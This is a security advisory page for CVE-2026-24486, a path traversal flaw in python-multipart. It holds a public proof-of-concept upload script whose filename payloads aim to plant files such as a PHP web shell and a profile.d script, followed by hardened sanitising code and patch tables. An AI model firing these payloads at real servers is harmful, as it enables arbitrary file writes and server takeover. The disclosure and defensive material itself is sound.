CVE-2026-24486
Description
Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. Users should upgrade to version 0.0.22 to receive a patch or, as a workaround, avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Python-Multipart 0.0.22 - Path Traversal
```python
# Exploit Title: Python-Multipart 0.0.22 - Path Traversal
# Date: 2026-02-23
# Exploit Author: cardosource
# Vendor Homepage: https://github.com/Kludex/python-multipart
# Software Link: https://pypi.org/project/python-multipart/
# Version: < 0.0.22 (REQUIRED)
# Tested on: Ubuntu / Python 3.13.5 / Docker (as root for demo)
# CVE : CVE-2026-24486
"""
PoC for CVE-2026-24486: Path Traversal in python-multipart when UPLOAD_KEEP_FILENAME=True + UPLOAD_DIR is configured.
Allows arbitrary file write via malicious filename.
"""
import os
import sys
import time

import requests

TARGET_URL = "http://localhost:8000/upload"
SOURCE_FILE = "/etc/hosts"  # Small file to upload (content written to target)

if not os.path.exists(SOURCE_FILE):
    print(f"[!] Source file not found: {SOURCE_FILE}")
    sys.exit(1)

# Malicious filenames (payloads)
payloads = [
    "/tmp/poc-abs.txt",
    "/etc/poc-etc.txt",
    "/root/poc-root.txt",
    "../../var/www/html/shell.php",
    "../../etc/profile.d/mal.sh",
    "../../../tmp/poc-deep.txt",
    "../../etc/passwd%00.txt",
    "//etc//poc-double-slash.txt",
]

print("[*] CVE-2026-24486 PoC")
print(f"[*] Target: {TARGET_URL}")
print(f"[*] Using source file: {SOURCE_FILE}")
print(f"[*] Testing {len(payloads)} payloads...\n")

for i, filename in enumerate(payloads, 1):
    print(f"[{i}/{len(payloads)}] Testing: {filename}")
    try:
        # Open the source file per request so the handle is always closed
        with open(SOURCE_FILE, 'rb') as fh:
            files = {
                'file': (filename, fh, 'text/plain')
            }
            r = requests.post(TARGET_URL, files=files, timeout=8)
        print(f"    Status: {r.status_code}")
        if r.text.strip():
            print(f"    Response: {r.text.strip()}")
        else:
            print("    Response: (empty)")
    except Exception as e:
        print(f"    Error: {e}")
    print("-" * 50)
    time.sleep(1.0)

print("\n[*] Done.")
print("Verify files in container:")
print("    docker exec -it vuln-poc find / -name '*poc*' -o -name '*shell*' 2>/dev/null")
print("\nMitigation:")
print("    - Upgrade: pip install python-multipart>=0.0.22")
print("    - Avoid UPLOAD_KEEP_FILENAME=True")
print("    - Sanitize: filename = os.path.basename(file.filename)")
```
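The description and the mitigation lines at the end of the PoC come down to one rule: the multipart `filename` parameter is attacker-controlled text and must never be used as a path. The following is an added example, not code from python-multipart or the advisory; the upload root `/srv/uploads` and the function names are constructed for illustration. It shows, side by side, the unsafe join that the PoC's filenames defeat and a hardened placement that keeps every one of them inside the upload directory.

```python
import os
import re

UPLOAD_DIR = "/srv/uploads"  # constructed example root the service may write to

# Filenames quoted from the PoC above, reused here as input for the sanitiser.
POC_FILENAMES = [
    "/tmp/poc-abs.txt",
    "/etc/poc-etc.txt",
    "../../var/www/html/shell.php",
    "../../etc/passwd%00.txt",
    "//etc//poc-double-slash.txt",
]
_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")

def naive_target_path(upload_dir: str, client_filename: str) -> str:
    """The unsafe pattern: the client's filename joined onto upload_dir as-is.

    os.path.join drops upload_dir when the second argument is absolute, and
    normalisation lets '..' climb out of it, so the client chooses the path.
    """
    return os.path.normpath(os.path.join(upload_dir, client_filename))

def safe_filename(client_filename: str) -> str:
    """Reduce an attacker-controlled filename to one safe path component."""
    if "\x00" in client_filename:
        raise ValueError("NUL byte in filename")
    # Keep only the last component, whichever separator the client used.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Replace anything outside a conservative allow-list. The '%00' in the PoC
    # arrives as literal text, not a NUL byte, and is neutralised here.
    name = _UNSAFE_CHARS.sub("_", name)
    if name in ("", ".", ".."):
        raise ValueError(f"unusable filename: {client_filename!r}")
    return name

def safe_target_path(upload_dir: str, client_filename: str) -> str:
    """Place the file under upload_dir and verify containment after normalisation."""
    root = os.path.abspath(upload_dir)
    target = os.path.abspath(os.path.join(root, safe_filename(client_filename)))
    if os.path.commonpath([root, target]) != root:  # defence in depth
        raise ValueError(f"escapes upload dir: {client_filename!r}")
    return target

def compare(upload_dir: str = UPLOAD_DIR) -> dict:
    """Map each PoC filename to (naive path, hardened path) for side-by-side review."""
    return {f: (naive_target_path(upload_dir, f), safe_target_path(upload_dir, f))
            for f in POC_FILENAMES}
```

Extension allow-listing and size limits are separate controls and are not shown here.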
OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| - | Affected | - |
Debian Mixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 0.0.20-1.1~deb13u1 |
| sid | Fixed | 0.0.20-1.1 |
| forky | Fixed | 0.0.20-1.1 |
| bullseye | Affected | - |
| bookworm | Affected | - |
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| PyPI | python-multipart | <0.0.22 | 0.0.22 |
References
- https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg
- https://nvd.nist.gov/vuln/detail/CVE-2026-24486
- https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4
- https://github.com/Kludex/python-multipart
- https://github.com/Kludex/python-multipart/releases/tag/0.0.22
- https://www.suse.com/security/cve/CVE-2026-24486.html
- https://security-tracker.debian.org/tracker/CVE-2026-24486